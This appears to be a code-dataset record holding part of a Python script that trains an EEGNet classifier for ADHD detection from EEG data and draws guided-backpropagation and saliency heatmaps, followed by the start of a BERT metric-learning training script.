self.batch_mean3 = torch.mean(data, [0, 2, 3], True)\n self.batch_std3 = torch.sqrt(torch.mean((data - self.batch_mean3) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma3[0, :, 0, 0] = self.batchnorm3.weight.clone().detach().requires_grad_(False).cpu()\n self.beta3[0, :, 0, 0] = self.batchnorm3.bias.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n def update_activ_forward(self):\n def activ_forward_hook_function1(module, ten_in, ten_out):\n self.activ_in1 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out1 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n def activ_forward_hook_function2(module, ten_in, ten_out):\n self.activ_in2 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out2 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.activ1.register_forward_hook(activ_forward_hook_function1)\n handle2 = self.activ2.register_forward_hook(activ_forward_hook_function2)\n #\n return [handle1, handle2]\n\n\n def update_activ_deconvolution(self):\n def activ_backward_hook_function(mmodule, grad_in, grad_out):\n modified_grad = torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function)\n return [handle1, handle2]\n\n def update_activ_guidedbackpropogation(self):\n def activ_backward_hook_function1(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out1 > 0, torch.ones_like(self.activ_out1),torch.zeros_like(self.activ_out1))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n def activ_backward_hook_function2(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out2 > 0, torch.ones_like(self.activ_out2),torch.zeros_like(self.activ_out2))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function1)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function2)\n return [handle1, handle2]\n\n\nclass VisTech():\n def __init__(self, model):\n self.model = model\n self.model.eval()\n\n self.eps = 0.000001\n self.method = None\n\n def enhanceheatmap(self, heatmap, r=5):\n\n sampleChannel = heatmap.shape[0]\n sampleLength = heatmap.shape[1]\n\n newmap = np.zeros((sampleChannel, sampleLength))\n for i in range(sampleChannel):\n for j in range(sampleLength):\n if j < r:\n newmap[i, j] = np.mean(heatmap[i, :j + r])\n elif j + r > sampleLength:\n newmap[i, j] = np.mean(heatmap[i, j - r:])\n else:\n newmap[i, j] = np.mean(heatmap[i, j - r:j + r])\n\n return newmap\n\n def convert_batchlayer_to_linear(self, batchInput):\n\n handles = self.model.update_batch_forward_meanstd()\n self.model(batchInput)\n self.remove_registered_functions(handles)\n handles = self.model.update_batch_forward()\n\n return handles\n\n def remove_registered_functions(self, handles):\n for handle in handles:\n handle.remove()\n\n def heatmap_calculation_backpropogation(self, batchInput, sampleidx, method='EpsilonLRP'):\n # This function output the heatmaps generate with different interpretation techniques.\n # Most of the techques can be achieved by modifying the nonlinear activation layers\n\n def calculate_one_hot_out_put(output):\n result = output.cpu().detach().numpy()\n preds = result.argmax(axis=-1)\n one_hot_output = np.zeros(result.shape)\n\n for i in range(preds.shape[0]):\n one_hot_output[i, preds[i]] = 1\n\n one_hot_output = torch.DoubleTensor(one_hot_output)\n\n return one_hot_output\n\n sampleInput = batchInput\n sampleInput.requires_grad = True\n\n handles0 = self.convert_batchlayer_to_linear(batchInput)\n\n if method == \"guidedbackpropogation\":\n handles1 = self.model.update_activ_forward()\n handles2 = self.model.update_activ_guidedbackpropogation()\n\n output = self.model(sampleInput)\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n self.remove_registered_functions(handles1 + handles2)\n\n\n elif method == \"Saliencymap\":\n output = self.model(sampleInput)\n\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n\n self.remove_registered_functions(handles0)\n # the methods will generate heatmaps for a batch, otherwise return the heatmap for a sample\n if sampleidx != None:\n heatmap = heatmap[sampleidx]\n\n return heatmap\n\n\n def generate_interpretation(self, batchInput, sampleidx, subid, samplelabel, likelihood, method):\n\n if likelihood[0] > likelihood[1]: #likelihood of the sample to be classified into normal and adhd state\n state = 0\n else:\n state = 1\n\n if samplelabel == 0:\n labelstr = 'normal'\n else:\n labelstr = 'adhd'\n\n sampleInput = batchInput[sampleidx].cpu().detach().numpy().squeeze()\n sampleChannel = sampleInput.shape[0]\n sampleLength = sampleInput.shape[1]\n\n channelnames =['Fp1', 'Fp2', 'F7', 'F3', 'Fz', 'F4', 'F8', 'T7', 'C3', 'Cz', 'C4', 'T8','P7', 'P3', 'Pz', 'P4', 'P8', '01', '02']\n\n\n heatmap_sample_thres = 2\n heatmap_channel_thres = 1\n\n # generate the original sample and channel contribution maps\n heatmap = self.heatmap_calculation_backpropogation(batchInput=batchInput, sampleidx=sampleidx, method=method)\n heatmap_channel = np.mean(heatmap, axis=1)\n\n\n # Step 1: normalization\n heatmap = (heatmap - np.mean(heatmap)) / (np.std(heatmap))\n heatmap_channel = (heatmap_channel - np.mean(heatmap_channel)) / (np.std(heatmap_channel))\n\n # Step 2: thresholding\n heatmap_channel = heatmap_channel - heatmap_channel_thres\n heatmap = heatmap - heatmap_sample_thres\n\n # set values below lower bound of color map -1 to -1\n for u in range(sampleChannel):\n for l in range(sampleLength):\n if heatmap[u, l] < -1:\n heatmap[u, l] = -1\n # Step 3: smoothing\n smooth_factor = 5\n heatmap = self.enhanceheatmap(heatmap, smooth_factor)\n\n\n\n # draw the figure\n rowdivide = 4\n fig = plt.figure(figsize=(15, 9))\n gridlayout = gridspec.GridSpec(ncols=2, nrows=rowdivide, figure=fig, wspace=0.05, hspace=0.3)\n axs0 = fig.add_subplot(gridlayout[0:rowdivide - 1, 0])\n axs1 = fig.add_subplot(gridlayout[0:rowdivide - 1, 1])\n axs2 = fig.add_subplot(gridlayout[rowdivide - 1, :])\n\n axs2.xaxis.set_ticks([])\n axs2.yaxis.set_ticks([])\n\n # display the results\n axs2.text(0.01, 0.8, 'Model: EEGNET Interpretation: ' + method ,horizontalalignment='left', fontsize=15)\n fig.suptitle('Subject:' + str(int(subid)) + ' ' + 'Label:' + labelstr + ' ' + '$P_{normal}=$' + str(\n round(likelihood[0], 2)) + ' $P_{adhd}=$' + str(round(likelihood[1], 2)), y=0.985, fontsize=17)\n\n\n thespan = np.percentile(sampleInput, 98)\n xx = np.arange(1, sampleLength + 1)\n\n for i in range(0, sampleChannel):\n y = sampleInput[i, :] + thespan * (sampleChannel - 1 - i)\n dydx = heatmap[i, :]\n\n points = np.array([xx, y]).T.reshape(-1, 1, 2)\n segments = np.concatenate([points[:-1], points[1:]], axis=1)\n norm = plt.Normalize(-1, 1)\n lc = LineCollection(segments, cmap='viridis', norm=norm)\n lc.set_array(dydx)\n lc.set_linewidth(2)\n axs0.add_collection(lc)\n\n yttics = np.zeros(sampleChannel)\n for gi in range(sampleChannel):\n yttics[gi] = gi * thespan\n\n axs0.set_ylim([-thespan, thespan * sampleChannel])\n axs0.set_xlim([0, sampleLength + 1])\n axs0.set_xticks([1, 128, 256, 384,512])\n axs0.set_xticklabels(['0', '1', '2','3', '4(s)'])\n\n inversechannelnames = []\n for i in range(sampleChannel):\n inversechannelnames.append(channelnames[sampleChannel - 1 - i])\n\n plt.sca(axs0)\n plt.yticks(yttics, inversechannelnames)\n\n montage = 'standard_1020'\n sfreq = 128\n\n info = mne.create_info(\n channelnames,\n ch_types=['eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg'],\n sfreq=sfreq\n )\n\n electrodes_coordinates = get_electrodes_coordinates(channelnames)\n # print(electrodes_coordinates)\n dig_points = get_electrodes_positions(channelnames, electrodes_coordinates)\n _,info = set_electrodes_montage(channelnames, electrodes_coordinates,sampleInput)\n\n im, cn = mne.viz.plot_topomap(data=heatmap_channel, pos=info, vmin=-1, vmax=1, axes=axs1, names=channelnames,\n show_names=True, outlines='head', cmap='viridis', show=False)\n fig.colorbar(im, ax=axs1)\n plt.show()\n\ndef plot_roc(fpr, tpr):\n plt.plot(fpr, tpr, label = 'ROC curve', linewidth = 2)\n plt.plot([0,1],[0,1], 'k--', linewidth = 2)\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC Curve ')\n plt.show()\ndef plot_cm(cm):\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.colorbar()\n plt.tight_layout()\n plt.xlabel('Predicted label')\n plt.ylabel('True label')\n\ndef specificity(y_true, y_pred):\n tn = sum((y_true == 0) & (y_pred == 0))\n fp = sum((y_true == 0) & (y_pred == 1))\n return tn / (tn + fp)\ndef sensitivity(y_true, y_pred):\n tp = sum((y_true == 1) & (y_pred == 1))\n fn = sum((y_true == 1) & (y_pred == 0))\n return tp / (tp + fn)\n\n\ndef run():\n\n\n channelnum = 19\n subjnum =120\n samplelength = 4\n sf = 128\n\n # define the learning rate, batch size and epoches\n lr = 1e-3\n batch_size = 32\n n_epoch = 2\n\n x_data, y_data, subIdx = data_load(PATH_DATASET_MAT)\n x_data = np.swapaxes(x_data, 2, 0)\n y_data = np.swapaxes(y_data, 1, 0)\n subIdx = np.swapaxes(subIdx, 1, 0)\n print(y_data[0:600, 1:4])\n print('x_data.shape: ', x_data.shape)\n print('y_data.shape: ', y_data.shape)\n print(subIdx)\n subIdx.astype(int)\n\n\n samplenum = y_data.shape[0]\n label = y_data[:, 0]\n print(\"laaaaaaaaaaabel\",label.shape)\n print(np.unique(subIdx))\n\n # ydata contains the label of samples\n ydata = np.zeros(samplenum, dtype=np.longlong)\n\n # the result stores accuracies of every subject\n results = []\n\n for i in range(samplenum):\n ydata[i] = label[i]\n\n X_train_org, X_test_org, y_train_org, y_test_org = train_test_split(x_data, y_data, test_size=0.2, shuffle=True,\n random_state=42)\n\n # select the subject index here\n for i in range(1, subjnum + 1):\n # form the training data\n trainindx = np.where(subIdx != i)[0]\n xtrain = x_data[trainindx]\n x_train = xtrain.reshape(xtrain.shape[0], 1, channelnum, samplelength * sf)\n y_train = ydata[trainindx]\n\n # form the testing data\n testindx = np.where(subIdx == i)[0]\n xtest = x_data[testindx]\n x_test = xtest.reshape(xtest.shape[0], 1, channelnum, samplelength * sf)\n y_test = ydata[testindx]\n\n train = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n\n # select the deep learning model to be used\n #my_net = InterpretableCNN().double()\n my_net = EEGNet().double()\n\n for p in my_net.parameters():\n p.requires_grad = True\n\n optimizer = optim.Adam(my_net.parameters(), lr=lr)\n loss_class = torch.nn.NLLLoss()\n # Define ReduceLROnPlateau scheduler\n scheduler = ReduceLROnPlateau(optimizer, mode='min', patience=10, verbose=True)\n\n # Define early stopping parameters\n early_stopping = {\n 'patience': 20, # Number of epochs with no improvement after which training will be stopped\n 'min_delta': 0.001, # Minimum change in validation loss to be considered as an improvement\n 'best_loss': float('inf'), # Initialize with a large value\n 'counter': 0 # Counter for the number of epochs with no improvement\n }\n\n # Tensorboard writer for logging\n\n\n train_accuracies = []\n val_accuracies = []\n\n # to track the training loss as the model trains\n train_losses = []\n # to track the validation loss as the model trains\n valid_losses = []\n # to track the average training loss per epoch as the model trains\n avg_train_losses = []\n # to track the average validation loss per epoch as the model trains\n avg_valid_losses = []\n\n patience = 20\n # initialize the early_stopping object\n early_stopping = EarlyStopping(patience=patience, verbose=True)\n\n # train the classifier\n for epoch in range(1,n_epoch+1):\n for j, data in enumerate(train_loader, 0):\n inputs, labels = data\n\n input_data = inputs\n class_label =labels\n #class_label = labels.view(-1, 1 ).double() for BCELoss\n\n train_loss =0.0\n\n my_net.zero_grad()\n my_net.train()\n\n class_output = my_net(input_data)\n err_s_label = loss_class(class_output, class_label)\n err = err_s_label\n\n err.backward()\n optimizer.step()\n train_loss += err.item()\n # record training loss\n train_losses.append(err.item())\n\n # Calculate average training loss for the epoch\n avg_train_loss = train_loss / len(train_loader)\n print(\"train loss avg\",avg_train_loss)\n\n my_net.eval()\n val_loss =0.0\n with torch.no_grad():\n\n x_test = torch.DoubleTensor(x_test)\n answer = my_net(x_test)\n print(\"y_test\",y_test)\n y_test = torch.from_numpy(y_test)\n #y_test=y_test.view(-1,1).double() for BCELoss\n print(type(y_test))\n loss = loss_class(answer, y_test)\n val_loss += loss.item()\n valid_losses.append(loss.item())\n probs = np.exp(answer.cpu().numpy())\n print(\"probs\",probs)\n\n preds = probs.argmax(axis=-1)\n print(\"preds\",preds)\n acc = accuracy_score(y_test, preds)\n precision = precision_score(y_test, preds)\n recall = recall_score(y_test, preds)\n f1 = f1_score(y_test, preds)\n\n print(acc)\n print(precision)\n print(recall)\n print(f1)\n print(\"val loss\",val_loss)\n print(valid_losses)\n print(specificity(y_test, preds))\n print(sensitivity(y_test, preds))\n results.append(acc)\n fpr, tpr, t = roc_curve(y_test, preds)\n cm = confusion_matrix(y_test, preds,labels=[0,1])\n print(\"conv matrix\",cm)\n #plot_roc(fpr, tpr)\n plot_cm(cm)\n\n # print training/validation statistics\n # calculate average loss over an epoch\n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n avg_train_losses.append(train_loss)\n avg_valid_losses.append(valid_loss)\n\n epoch_len = len(str(n_epoch))\n\n print_msg = (f'[{epoch:>{epoch_len}}/{n_epoch:>{epoch_len}}] ' +f'train_loss: {train_loss:.5f} ' +f'valid_loss: {valid_loss:.5f}')\n print(print_msg)\n\n # clear lists to track next epoch\n train_losses = []\n valid_losses = []\n\n # load the last checkpoint with the best model\n #my_net.load_state_dict(torch.load('checkpoint.pt'))\n\n # early_stopping needs the validation loss to check if it has decresed,\n # and if it has, it will make a checkpoint of the current model\n early_stopping(valid_loss, my_net)\n\n if early_stopping.early_stop:\n print(\"Early stopping\")\n break\n\n\n print('mean accuracy:', np.mean(results))\n\n\n\n # Save the trained model to a file\n torch.save(my_net.state_dict(), 'trained_cnn_model.pth')\n sampleVis = VisTech(my_net)\n\n # select the interpretation method to be used\n method=\"guidedbackpropogation\"\n # method=\"Saliencymap\"\n ########################################\n\n sampleidx = 8\n sampleVis.generate_interpretation(batchInput=x_test, sampleidx=sampleidx, subid=i,\n samplelabel=y_test[sampleidx], likelihood=probs[sampleidx], method=method)\n\n\ntorch.cuda.empty_cache()\n\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "ahmedguebsi/XAI_ADHD_Detection", "sub_path": "adhd_deep/xai_all.py", "file_name": "xai_all.py", "file_ext": "py", "file_size_in_byte": 27274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.empty_cache", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.div", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 409, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 409, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 430, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 431, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 432, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 432, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 438, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 451, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "mne.create_info", "line_number": 457, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_coordinates", "line_number": 466, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_positions", "line_number": 468, "usage_type": "call"}, {"api_name": "electrodes_positions.set_electrodes_montage", "line_number": 469, "usage_type": "call"}, {"api_name": "mne.viz.plot_topomap", "line_number": 471, "usage_type": "call"}, {"api_name": "mne.viz", "line_number": 471, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 477, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 477, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 478, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 479, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 480, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 484, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 484, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 486, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "adhd_classification.data_load", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.longlong", "line_number": 530, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 555, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 556, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 565, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 565, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 566, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 566, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 568, "usage_type": "call"}, {"api_name": "early_stopping.EarlyStopping", "line_number": 595, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 627, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 629, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 638, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 643, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 644, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 645, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 646, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 657, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 658, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 665, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 666, "usage_type": "call"}, {"api_name": "early_stopping.early_stop", "line_number": 686, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 691, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 696, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 709, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 709, "usage_type": "attribute"}]} +{"seq_id": "22511070015", "text": "import logging\nimport math\nimport os\nimport random\nimport shutil\n\nimport datasets\nfrom datasets import load_dataset\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom tqdm.auto import tqdm\n\nimport transformers\nfrom accelerate import Accelerator\nfrom transformers import (\n AdamW,\n AutoTokenizer,\n DataCollatorWithPadding,\n default_data_collator,\n get_scheduler,\n set_seed,\n)\n\nimport modules.args as args\nfrom modules.models import (\n BertCls,\n BertClsSoftmaxCrossEntropyLoss,\n BertClsArcFaceLoss,\n TripletMarginLoss,\n MultiSimilarityLoss,\n NTXentLoss,\n)\nfrom modules.utils import AccuracyCalculator\nfrom modules.samplers import (\n MPerClassSampler, \n MPerClassSamplerWithoutEasyPostives\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef choose_loss(args, num_labels):\n if args.loss_type == \"softmax\":\n model = BertClsSoftmaxCrossEntropyLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n )\n return model, None\n elif args.loss_type == \"arcface\":\n model = BertClsArcFaceLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n margin=args.margin,\n scale=args.scale\n )\n return model, None\n elif args.loss_type == \"triplet\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = TripletMarginLoss(\n margin=args.margin,\n triplets_per_anchor=\"all\"\n )\n return bert_model, loss_model\n elif args.loss_type == \"ms\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = MultiSimilarityLoss(\n alpha=args.alpha,\n beta=args.beta,\n base=args.base\n )\n return bert_model, loss_model\n elif args.loss_type == \"ntxent\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = NTXentLoss(\n temperature=args.temperature\n )\n return bert_model, loss_model\n else:\n logging.error(\"choose one loss model\")\n exit(1)\n\n\ndef main(args):\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n accelerator = Accelerator()\n # Make one log on every process with the configuration for debugging.\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n logger.info(accelerator.state)\n\n # Setup logging, we only want one process per machine to log things on the screen.\n # accelerator.is_local_main_process is only True for one process per machine.\n logger.setLevel(logging.INFO if accelerator.is_local_main_process else 